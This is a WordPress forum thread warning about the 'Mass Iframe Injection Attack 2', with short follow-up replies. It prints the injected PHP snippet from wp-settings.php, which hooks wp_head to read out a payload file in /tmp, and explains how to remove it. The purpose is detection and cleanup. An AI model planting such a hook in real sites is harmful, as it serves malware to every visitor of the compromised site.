Mass Iframe Injection Attack 2 affecting a lot of WordPress Sites

by UMS
3 replies
  • WEB DESIGN
  • |
Found out 2 of my sites got affected with
Mass Iframe Injection Attack 2


The quickest way to check if your WordPress site contains any malware, is to do a free scan at:

Sucuri SiteCheck - Free Website Malware Scans

In the case of this specific hack, the following code gets inserted into wp-settings.php

Code:
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');
The malware is contained in /tmp/wp_inc (in most cases).

To fix, you need to remove the above code from wp-settings.php

See WordPress › Support » My website is Infected with Mass Iframe Injection Attack 2 for more details.
#affecting #attack #iframe #injection #lot #mass #sites #wordpress
  • Profile picture of the author Michael71
    Thanks for the hint.

    Do you know if the Antivirus plugin from Sergej Müller can find that virus?
    Signature

    HTML/CSS/jQuery/ZURB Foundation/Twitter Bootstrap/Wordpress/Frontend Performance Optimizing
    ---
    Need HTML/CSS help? Skype: microcosmic - Test Your Responsive Design - InternetCookies.eu

    {{ DiscussionBoard.errors[4996813].message }}
  • Profile picture of the author primitip
    What exactly the above code do?
    {{ DiscussionBoard.errors[4996821].message }}
    • Profile picture of the author Michael71
      Originally Posted by primitip View Post

      What exactly the above code do?
      See WordPress › Support » My website is Infected with Mass Iframe Injection Attack 2 for more details.
      Signature

      HTML/CSS/jQuery/ZURB Foundation/Twitter Bootstrap/Wordpress/Frontend Performance Optimizing
      ---
      Need HTML/CSS help? Skype: microcosmic - Test Your Responsive Design - InternetCookies.eu

      {{ DiscussionBoard.errors[4996843].message }}

Trending Topics